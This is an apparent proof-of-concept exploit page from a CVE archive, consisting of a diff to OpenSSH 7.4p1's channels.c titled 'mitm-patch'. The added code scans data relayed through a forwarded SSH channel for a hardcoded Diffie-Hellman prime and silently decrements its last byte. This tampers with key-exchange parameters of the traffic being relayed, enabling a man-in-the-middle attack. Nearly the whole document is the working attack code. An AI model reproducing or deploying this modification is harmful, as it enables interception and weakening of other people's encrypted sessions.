4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / openssh-7.4p1-mitm-patch.txt TXT
diff --git a/channels.c b/channels.c
index bef8ad6..b92a7a9 100644
--- a/channels.c
+++ b/channels.c
@@ -2703,6 +2703,30 @@ channel_proxy_upstream(Channel *c, int type, u_int32_t seq, void *ctxt)
 
 /* -- protocol input */
 
+static unsigned char dhm_p[] =
+
+{0xAD, 0x10, 0x7E, 0x1E, 0x91, 0x23, 0xA9, 0xD0, 0xD6, 0x60, 0xFA, 0xA7, 
+0x95, 0x59, 0xC5, 0x1F, 0xA2, 0x0D, 0x64, 0xE5, 0x68, 0x3B, 0x9F, 0xD1, 
+0xB5, 0x4B, 0x15, 0x97, 0xB6, 0x1D, 0x0A, 0x75, 0xE6, 0xFA, 0x14, 0x1D, 
+0xF9, 0x5A, 0x56, 0xDB, 0xAF, 0x9A, 0x3C, 0x40, 0x7B, 0xA1, 0xDF, 0x15, 
+0xEB, 0x3D, 0x68, 0x8A, 0x30, 0x9C, 0x18, 0x0E, 0x1D, 0xE6, 0xB8, 0x5A, 
+0x12, 0x74, 0xA0, 0xA6, 0x6D, 0x3F, 0x81, 0x52, 0xAD, 0x6A, 0xC2, 0x12, 
+0x90, 0x37, 0xC9, 0xED, 0xEF, 0xDA, 0x4D, 0xF8, 0xD9, 0x1E, 0x8F, 0xEF, 
+0x55, 0xB7, 0x39, 0x4B, 0x7A, 0xD5, 0xB7, 0xD0, 0xB6, 0xC1, 0x22, 0x07, 
+0xC9, 0xF9, 0x8D, 0x11, 0xED, 0x34, 0xDB, 0xF6, 0xC6, 0xBA, 0x0B, 0x2C, 
+0x8B, 0xBC, 0x27, 0xBE, 0x6A, 0x00, 0xE0, 0xA0, 0xB9, 0xC4, 0x97, 0x08, 
+0xB3, 0xBF, 0x8A, 0x31, 0x70, 0x91, 0x88, 0x36, 0x81, 0x28, 0x61, 0x30, 
+0xBC, 0x89, 0x85, 0xDB, 0x16, 0x02, 0xE7, 0x14, 0x41, 0x5D, 0x93, 0x30, 
+0x27, 0x82, 0x73, 0xC7, 0xDE, 0x31, 0xEF, 0xDC, 0x73, 0x10, 0xF7, 0x12, 
+0x1F, 0xD5, 0xA0, 0x74, 0x15, 0x98, 0x7D, 0x9A, 0xDC, 0x0A, 0x48, 0x6D, 
+0xCD, 0xF9, 0x3A, 0xCC, 0x44, 0x32, 0x83, 0x87, 0x31, 0x5D, 0x75, 0xE1, 
+0x98, 0xC6, 0x41, 0xA4, 0x80, 0xCD, 0x86, 0xA1, 0xB9, 0xE5, 0x87, 0xE8, 
+0xBE, 0x60, 0xE6, 0x9C, 0xC9, 0x28, 0xB2, 0xB9, 0xC5, 0x21, 0x72, 0xE4, 
+0x13, 0x04, 0x2E, 0x9B, 0x23, 0xF1, 0x0B, 0x0E, 0x16, 0xE7, 0x97, 0x63, 
+0xC9, 0xB5, 0x3D, 0xCF, 0x4B, 0xA8, 0x0A, 0x29, 0xE3, 0xFB, 0x73, 0xC1, 
+0x6B, 0x8E, 0x75, 0xB9, 0x7E, 0xF3, 0x63, 0xE2, 0xFF, 0xA3, 0x1F, 0x71, 
+0xCF, 0x9D, 0xE5, 0x38, 0x4E, 0x71, 0xB8, 0x1C, 0x0A, 0xC4, 0xDF, 0xFE, 
+0x0C, 0x10, 0xE6, 0x4F};
 /* ARGSUSED */
 int
 channel_input_data(int type, u_int32_t seq, void *ctxt)
@@ -2711,6 +2735,7 @@ channel_input_data(int type, u_int32_t seq, void *ctxt)
 	const u_char *data;
 	u_int data_len, win_len;
 	Channel *c;
+    u_char* dhm_p_pos;
 
 	/* Get the channel number and verify it. */
 	id = packet_get_int();
@@ -2760,8 +2785,15 @@ channel_input_data(int type, u_int32_t seq, void *ctxt)
 	}
 	if (c->datagram)
 		buffer_put_string(&c->output, data, data_len);
-	else
+	else {
+        dhm_p_pos = memmem(data, data_len, dhm_p, sizeof(dhm_p));
+        if ( dhm_p_pos != NULL ) {
+            debug3("DH P found");
+            dhm_p_pos += sizeof(dhm_p) - 1;
+            (*dhm_p_pos)--;
+        }
 		buffer_append(&c->output, data, data_len);
+    }
 	packet_check_eom();
 	return 0;
 }